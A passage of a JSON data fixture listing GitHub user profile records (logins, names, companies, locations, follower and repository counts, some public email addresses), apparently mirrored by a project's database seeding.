"collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2017-06-16T15:53:59Z", + "updated_at": "2024-07-01T04:51:52Z", + "node_id": "MDQ6VXNlcjI5NDg3Mjk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3174, + "fields": { + "nest_created_at": "2024-09-12T03:15:21.953Z", + "nest_updated_at": "2024-09-12T03:15:21.953Z", + "name": "", + "login": "anaroth-pt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/179763080?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-08-28T21:22:15Z", + "updated_at": "2024-09-04T15:07:32Z", + "node_id": "U_kgDOCrb3iA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3175, + "fields": { + "nest_created_at": "2024-09-12T03:15:41.182Z", + "nest_updated_at": "2024-09-21T07:23:37.923Z", + "name": "Gianluca", + "login": "gianlucapisati", + "email": "gianluca.pisati@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/438602?v=4", + "company": "Vidiemme", + "location": "Milan", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 36, + "created_at": "2010-10-13T22:22:15Z", + "updated_at": "2024-08-29T16:39:39Z", + "node_id": "MDQ6VXNlcjQzODYwMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3176, + "fields": { + "nest_created_at": "2024-09-12T03:15:46.153Z", + "nest_updated_at": "2024-09-22T20:32:04.777Z", + "name": "Ryan Morton", + "login": "rynmrtn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72798?v=4", + "company": "", + "location": "Baltimore, MD", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 27, + "public_gists_count": 37, + "public_repositories_count": 31, + "created_at": "2009-04-11T18:08:38Z", + "updated_at": "2024-04-24T19:02:52Z", + "node_id": "MDQ6VXNlcjcyNzk4", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3177, + "fields": { + "nest_created_at": "2024-09-12T03:16:12.079Z", + "nest_updated_at": "2024-09-12T03:16:12.079Z", + "name": "Niels Hofmans", + "login": "hazcod", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5222512?v=4", + "company": "ironPeak", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 131, + "public_gists_count": 60, + "public_repositories_count": 180, + "created_at": "2013-08-13T14:39:48Z", + "updated_at": "2024-08-17T08:51:26Z", + "node_id": "MDQ6VXNlcjUyMjI1MTI=", + "bio": "Hello! I'm a cybersecurity freelancer and an open sourcerer from Belgium.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3178, + "fields": { + "nest_created_at": "2024-09-12T03:16:12.930Z", + "nest_updated_at": "2024-09-22T20:31:54.084Z", + "name": "Jonathan Hult", + "login": "jhult", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9849069?v=4", + "company": "", + "location": "Austin, TX", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 54, + "public_gists_count": 8, + "public_repositories_count": 124, + "created_at": "2014-11-19T18:28:48Z", + "updated_at": "2024-08-31T14:47:49Z", + "node_id": "MDQ6VXNlcjk4NDkwNjk=", + "bio": "Staff Software Engineer with 13+ years of experience in software engineering, consulting, and pre-sales.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3179, + "fields": { + "nest_created_at": "2024-09-12T03:16:18.253Z", + "nest_updated_at": "2024-09-12T03:16:18.253Z", + "name": "Philippe Delteil", + "login": "pdelteil", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20244863?v=4", + "company": "INFO-SEC", + "location": "", + "collaborators_count": 0, + "following_count": 63, + "followers_count": 223, + "public_gists_count": 30, + "public_repositories_count": 82, + "created_at": "2016-07-01T15:01:32Z", + "updated_at": "2024-08-06T02:32:19Z", + "node_id": "MDQ6VXNlcjIwMjQ0ODYz", + "bio": "Hacker wanna be. ", + "is_hireable": false, + "twitter_username": "philippedelteil" + } +}, +{ + "model": "github.user", + "pk": 3180, + "fields": { + "nest_created_at": "2024-09-12T03:16:20.775Z", + "nest_updated_at": "2024-09-12T03:16:20.775Z", + "name": "", + "login": "ragunath9293", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/75081391?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-11-26T13:52:23Z", + "updated_at": "2024-08-17T13:44:51Z", + "node_id": "MDQ6VXNlcjc1MDgxMzkx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3181, + "fields": { + "nest_created_at": "2024-09-12T03:16:21.619Z", + "nest_updated_at": "2024-09-22T20:31:58.751Z", + "name": "Rafael Cupello", + "login": "cupello", + "email": "rafacupello@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3408672?v=4", + "company": "B2W BIT", + "location": "RJ, Brazil", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 31, + "public_gists_count": 2, + "public_repositories_count": 131, + "created_at": "2013-01-28T18:12:57Z", + "updated_at": "2024-09-20T16:12:20Z", + "node_id": "MDQ6VXNlcjM0MDg2NzI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3182, + "fields": { + "nest_created_at": "2024-09-12T03:16:32.356Z", + "nest_updated_at": "2024-09-22T20:32:09.947Z", + "name": "James Pudson", + "login": "nepsilon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/600720?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 106, + "public_repositories_count": 1, + "created_at": "2011-02-04T16:30:21Z", + "updated_at": "2024-08-08T15:16:06Z", + "node_id": "MDQ6VXNlcjYwMDcyMA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3183, + "fields": { + "nest_created_at": "2024-09-13T03:39:11.798Z", + "nest_updated_at": "2024-09-13T03:39:11.798Z", + "name": "", + "login": "l3ra", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24881613?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2017-01-02T20:32:33Z", + "updated_at": "2024-07-26T10:41:00Z", + "node_id": "MDQ6VXNlcjI0ODgxNjEz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3184, + "fields": { + "nest_created_at": "2024-09-13T03:39:13.193Z", + "nest_updated_at": "2024-09-22T15:38:08.917Z", + "name": "Aaron Heck", + "login": "ubcaaronheck", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38470914?v=4", + "company": "The University of British Columbia", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-17T16:21:25Z", + "updated_at": "2024-06-12T16:07:49Z", + "node_id": "MDQ6VXNlcjM4NDcwOTE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3185, + "fields": { + "nest_created_at": "2024-09-13T03:46:09.091Z", + "nest_updated_at": "2024-09-22T15:48:14.152Z", + "name": "", + "login": "AndrewSilberman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/133234951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-05-11T13:41:29Z", + "updated_at": "2023-05-11T13:41:29Z", + "node_id": "U_kgDOB_EBBw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3186, + "fields": { + "nest_created_at": "2024-09-13T04:14:37.853Z", + "nest_updated_at": "2024-09-22T17:34:30.361Z", + "name": "Artem Nikolaev", + "login": "ArtemNikolaev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4076586?v=4", + "company": "", + "location": "Minsk, Belarus", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 51, + "created_at": "2013-04-06T10:41:18Z", + "updated_at": "2024-09-13T11:54:48Z", + "node_id": "MDQ6VXNlcjQwNzY1ODY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3187, + "fields": { + "nest_created_at": "2024-09-13T04:14:47.072Z", + "nest_updated_at": "2024-09-22T17:34:41.936Z", + "name": "", + "login": "henryshiumusic", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/172324404?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2024-06-10T21:02:58Z", + "updated_at": "2024-06-10T21:03:00Z", + "node_id": "U_kgDOCkV2NA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3188, + "fields": { + "nest_created_at": "2024-09-13T04:14:51.377Z", + "nest_updated_at": "2024-09-22T17:34:47.869Z", + "name": "timothy", + "login": "timprivatelysleeps23", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/122581036?v=4", + "company": "", + "location": "san diago", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-01-13T01:17:22Z", + "updated_at": "2023-01-22T17:40:18Z", + "node_id": "U_kgDOB05wLA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3189, + "fields": { + "nest_created_at": "2024-09-13T04:18:04.915Z", + "nest_updated_at": "2024-09-13T04:18:04.915Z", + "name": "M.L.", + "login": "mlcloudsec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2744135?v=4", + "company": "", + "location": "Phoenix, AZ", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 13, + "public_repositories_count": 94, + "created_at": "2012-11-07T15:55:55Z", + "updated_at": "2024-09-11T04:07:50Z", + "node_id": "MDQ6VXNlcjI3NDQxMzU=", + "bio": "Cloud, Web and macOS Security.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3190, + "fields": { + "nest_created_at": "2024-09-13T04:18:05.594Z", + "nest_updated_at": "2024-09-22T17:39:24.428Z", + "name": "", + "login": "AlphaKiloDelta", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68220964?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2020-07-13T08:46:42Z", + "updated_at": "2023-11-06T08:19:17Z", + "node_id": "MDQ6VXNlcjY4MjIwOTY0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3191, + "fields": { + "nest_created_at": "2024-09-13T04:18:06.605Z", + "nest_updated_at": "2024-09-13T04:18:06.605Z", + "name": "Elvin Gasanov", + "login": "elvin365", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55601311?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 75, + "followers_count": 20, + "public_gists_count": 0, + "public_repositories_count": 102, + "created_at": "2019-09-20T19:03:35Z", + "updated_at": "2024-07-28T21:28:27Z", + "node_id": "MDQ6VXNlcjU1NjAxMzEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3192, + "fields": { + "nest_created_at": "2024-09-13T04:18:06.931Z", + "nest_updated_at": "2024-09-22T17:39:57.232Z", + "name": "Starr Brown", + "login": "mamicidal", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112129498?v=4", + "company": "OWASP", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-08-25T21:31:03Z", + "updated_at": "2024-08-27T13:32:39Z", + "node_id": "U_kgDOBq712g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3193, + "fields": { + "nest_created_at": "2024-09-13T04:19:08.365Z", + "nest_updated_at": "2024-09-22T17:41:03.634Z", + "name": "Albert T. Wong", + "login": "alberttwong", + "email": "atwong@alumni.uci.edu", + "avatar_url": "https://avatars.githubusercontent.com/u/749093?v=4", + "company": "Onehouse.ai", + "location": "Los Angeles, CA, USA", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 49, + "public_gists_count": 4, + "public_repositories_count": 113, + "created_at": "2011-04-24T18:29:12Z", + "updated_at": "2024-09-21T15:33:33Z", + "node_id": "MDQ6VXNlcjc0OTA5Mw==", + "bio": "#eCommerce #Java #Database #k8s #Automation. Hobbies: #BoardGames #Comics #Skeet #VideoGames #Pinball #Magic #YelpElite #Travel #Candy #RoadBiking", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3194, + "fields": { + "nest_created_at": "2024-09-13T04:19:25.733Z", + "nest_updated_at": "2024-09-22T17:41:25.273Z", + "name": "", + "login": "whydee86", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43274863?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 86, + "public_gists_count": 0, + "public_repositories_count": 24, + "created_at": "2018-09-14T15:01:41Z", + "updated_at": "2024-06-09T12:26:28Z", + "node_id": "MDQ6VXNlcjQzMjc0ODYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3195, + "fields": { + "nest_created_at": "2024-09-13T04:19:26.404Z", + "nest_updated_at": "2024-09-22T17:41:27.325Z", + "name": "bedef", + "login": "fedeb95", + "email": "federico.bonfiglio@protonmail.ch", + "avatar_url": "https://avatars.githubusercontent.com/u/25415908?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 42, + "created_at": "2017-01-29T13:05:59Z", + "updated_at": "2024-09-02T09:07:40Z", + "node_id": "MDQ6VXNlcjI1NDE1OTA4", + "bio": "Programmer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3196, + "fields": { + "nest_created_at": "2024-09-13T04:55:54.148Z", + "nest_updated_at": "2024-09-22T18:31:57.753Z", + "name": "", + "login": "KnightYoshi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6134576?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 5, + "public_gists_count": 3, + "public_repositories_count": 3, + "created_at": "2013-12-08T09:42:10Z", + "updated_at": "2024-07-20T03:29:55Z", + "node_id": "MDQ6VXNlcjYxMzQ1NzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3197, + "fields": { + "nest_created_at": "2024-09-13T04:56:23.153Z", + "nest_updated_at": "2024-09-22T18:32:37.792Z", + "name": "Ali-Akber Saifee", + "login": "alisaifee", + "email": "ali@indydevs.org", + "avatar_url": "https://avatars.githubusercontent.com/u/79842?v=4", + "company": "@indydevs ", + "location": "Burnaby, British Columbia", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 75, + "public_gists_count": 11, + "public_repositories_count": 51, + "created_at": "2009-05-01T06:15:48Z", + "updated_at": "2024-03-09T20:30:27Z", + "node_id": "MDQ6VXNlcjc5ODQy", + "bio": "", + "is_hireable": false, + "twitter_username": "alisaifee" + } +}, +{ + "model": "github.user", + "pk": 3198, + "fields": { + "nest_created_at": "2024-09-13T05:02:25.853Z", + "nest_updated_at": "2024-09-22T20:30:15.524Z", + "name": "", + "login": "chhajershrenik", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/57632527?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 34, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 235, + "created_at": "2019-11-11T15:34:54Z", + "updated_at": "2024-08-24T21:43:48Z", + "node_id": "MDQ6VXNlcjU3NjMyNTI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3199, + "fields": { + "nest_created_at": "2024-09-13T05:04:46.670Z", + "nest_updated_at": "2024-09-13T16:27:26.811Z", + "name": "", + "login": "anakin1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24998343?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-01-09T03:10:19Z", + "updated_at": "2022-01-26T01:59:08Z", + "node_id": "MDQ6VXNlcjI0OTk4MzQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3200, + "fields": { + "nest_created_at": "2024-09-13T05:04:49.277Z", + "nest_updated_at": "2024-09-13T05:04:49.277Z", + "name": "Boyar Denis", + "login": "BoyarD1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/178677662?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-08-17T20:49:47Z", + "updated_at": "2024-08-21T13:03:23Z", + "node_id": "U_kgDOCqZnng", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3201, + "fields": { + "nest_created_at": "2024-09-13T05:04:59.209Z", + "nest_updated_at": "2024-09-13T05:04:59.209Z", + "name": "", + "login": "vdl1992", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10447476?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2015-01-08T09:07:09Z", + "updated_at": "2020-07-08T13:23:05Z", + "node_id": "MDQ6VXNlcjEwNDQ3NDc2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3202, + "fields": { + "nest_created_at": "2024-09-13T05:05:05.198Z", + "nest_updated_at": "2024-09-22T17:34:20.030Z", + "name": "Arosio Stefano", + "login": "stefano-1973", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46063667?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-12-22T06:31:11Z", + "updated_at": "2024-04-30T07:05:06Z", + "node_id": "MDQ6VXNlcjQ2MDYzNjY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3203, + "fields": { + "nest_created_at": "2024-09-13T05:05:19.806Z", + "nest_updated_at": "2024-09-13T16:27:52.429Z", + "name": "", + "login": "andrzejswiatek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44639433?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-10-31T11:11:29Z", + "updated_at": "2024-09-12T13:44:13Z", + "node_id": "MDQ6VXNlcjQ0NjM5NDMz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3204, + "fields": { + "nest_created_at": "2024-09-13T05:05:20.844Z", + "nest_updated_at": "2024-09-22T19:49:00.259Z", + "name": "Visshal Natarajan - Cloudsine", + "login": "Dr-Lazarus-V2", + "email": "visshal@cloudsine.tech", + "avatar_url": "https://avatars.githubusercontent.com/u/169629015?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-05-13T02:27:22Z", + "updated_at": "2024-07-28T22:21:51Z", + "node_id": "U_kgDOChxVVw", + "bio": "Software Engineer @ Cloudsine ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3205, + "fields": { + "nest_created_at": "2024-09-13T05:06:28.497Z", + "nest_updated_at": "2024-09-13T05:06:28.497Z", + "name": "Phil Skentelbery", + "login": "philskents", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2011227?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 3, + "public_repositories_count": 34, + "created_at": "2012-07-20T10:36:27Z", + "updated_at": "2024-07-03T03:10:58Z", + "node_id": "MDQ6VXNlcjIwMTEyMjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3206, + "fields": { + "nest_created_at": "2024-09-13T05:07:34.235Z", + "nest_updated_at": "2024-09-14T19:17:22.433Z", + "name": "", + "login": "1muen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49640488?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2019-04-15T10:08:06Z", + "updated_at": "2024-09-10T09:58:22Z", + "node_id": "MDQ6VXNlcjQ5NjQwNDg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3207, + "fields": { + "nest_created_at": "2024-09-13T05:07:44.667Z", + "nest_updated_at": "2024-09-22T19:43:49.847Z", + "name": "Divya", + "login": "007divyachawla", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7563150?v=4", + "company": "Tata Consultancy Services Limites", + "location": "Noida", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 6, + "public_gists_count": 2, + "public_repositories_count": 85, + "created_at": "2014-05-12T22:31:50Z", + "updated_at": "2024-09-16T07:33:28Z", + "node_id": "MDQ6VXNlcjc1NjMxNTA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3208, + "fields": { + "nest_created_at": "2024-09-13T05:08:40.159Z", + "nest_updated_at": "2024-09-13T05:08:40.159Z", + "name": "Laurent Michenaud", + "login": "Michenux", + "email": "lmichenaud@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/650789?v=4", + "company": "Twiddle Technologies", + "location": "Nantes", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 24, + "public_gists_count": 1, + "public_repositories_count": 9, + "created_at": "2011-03-04T11:11:00Z", + "updated_at": "2023-05-16T15:32:51Z", + "node_id": "MDQ6VXNlcjY1MDc4OQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3209, + "fields": { + "nest_created_at": "2024-09-13T05:08:40.827Z", + "nest_updated_at": "2024-09-22T19:41:32.973Z", + "name": "Artur Ferfecki", + "login": "theartusz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/40075318?v=4", + "company": "", + "location": "Bergen", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2018-06-08T22:08:11Z", + "updated_at": "2024-06-11T10:44:35Z", + "node_id": "MDQ6VXNlcjQwMDc1MzE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3210, + "fields": { + "nest_created_at": "2024-09-13T05:08:43.214Z", + "nest_updated_at": "2024-09-22T19:41:35.504Z", + "name": "", + "login": "davidr-bgp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/175223953?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2024-07-10T13:21:38Z", + "updated_at": "2024-07-10T13:21:53Z", + "node_id": "U_kgDOCnG0kQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3211, + "fields": { + "nest_created_at": "2024-09-13T05:08:45.938Z", + "nest_updated_at": "2024-09-13T05:08:45.938Z", + "name": "", + "login": "savdbroek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/115026177?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2022-10-04T15:39:16Z", + "updated_at": "2024-07-26T10:42:52Z", + "node_id": "U_kgDOBtspAQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3212, + "fields": { + "nest_created_at": "2024-09-13T05:08:48.641Z", + "nest_updated_at": "2024-09-13T05:08:48.641Z", + "name": "Marius", + "login": "rhizoet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58997736?v=4", + "company": "@23technologies ", + "location": "World", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2019-12-17T22:57:58Z", + "updated_at": "2024-07-31T06:48:19Z", + "node_id": "MDQ6VXNlcjU4OTk3NzM2", + "bio": "Senior DevOps Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3213, + "fields": { + "nest_created_at": "2024-09-13T05:09:17.490Z", + "nest_updated_at": "2024-09-22T19:42:50.755Z", + "name": "Christos Leventis", + "login": "Sovenique", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/83651108?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2021-05-04T13:06:36Z", + "updated_at": "2023-11-11T17:46:32Z", + "node_id": "MDQ6VXNlcjgzNjUxMTA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3214, + "fields": { + "nest_created_at": "2024-09-13T05:12:40.140Z", + "nest_updated_at": "2024-09-13T05:12:40.140Z", + "name": "Philipp", + "login": "phzs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11651131?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-03-25T16:32:45Z", + "updated_at": "2024-08-28T15:29:24Z", + "node_id": "MDQ6VXNlcjExNjUxMTMx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3215, + "fields": { + "nest_created_at": "2024-09-13T05:12:43.150Z", + "nest_updated_at": "2024-09-13T05:12:43.150Z", + "name": "DvR", + "login": "Anuubis", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3081217?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2012-12-19T13:45:53Z", + "updated_at": "2024-08-15T11:15:11Z", + "node_id": "MDQ6VXNlcjMwODEyMTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3216, + "fields": { + "nest_created_at": "2024-09-13T05:13:04.967Z", + "nest_updated_at": "2024-09-22T19:26:03.912Z", + "name": "Timothy", + "login": "HilthonTT", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118371200?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2022-11-16T14:45:01Z", + "updated_at": "2024-09-01T17:28:16Z", + "node_id": "U_kgDOBw4zgA", + "bio": "Wir müssen wissen, wir werden wissen.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3217, + "fields": { + "nest_created_at": "2024-09-13T05:13:34.792Z", + "nest_updated_at": "2024-09-22T19:25:25.906Z", + "name": "CQ", + "login": "cq674350529", + "email": "cq674350529@163.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13868458?v=4", + "company": "", + "location": "China", + "collaborators_count": 0, + "following_count": 78, + "followers_count": 182, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2015-08-19T11:17:33Z", + "updated_at": "2024-09-18T01:29:18Z", + "node_id": "MDQ6VXNlcjEzODY4NDU4", + "bio": "", + "is_hireable": false, + "twitter_username": "cq674350529" + } +}, +{ + "model": "github.user", + "pk": 3218, + "fields": { + "nest_created_at": "2024-09-13T05:14:00.980Z", + "nest_updated_at": "2024-09-22T19:24:13.025Z", + "name": "Fabian", + "login": "fabgilson", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1422587?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2012-02-09T10:26:07Z", + "updated_at": "2024-08-23T03:25:03Z", + "node_id": "MDQ6VXNlcjE0MjI1ODc=", + "bio": "", + "is_hireable": false, + "twitter_username": "FabGilson" + } +}, +{ + "model": "github.user", + "pk": 3219, + "fields": { + "nest_created_at": "2024-09-13T05:14:38.967Z", + "nest_updated_at": "2024-09-13T05:14:38.967Z", + "name": "", + "login": "SecLoop", + "email": "", + "avatar_url": 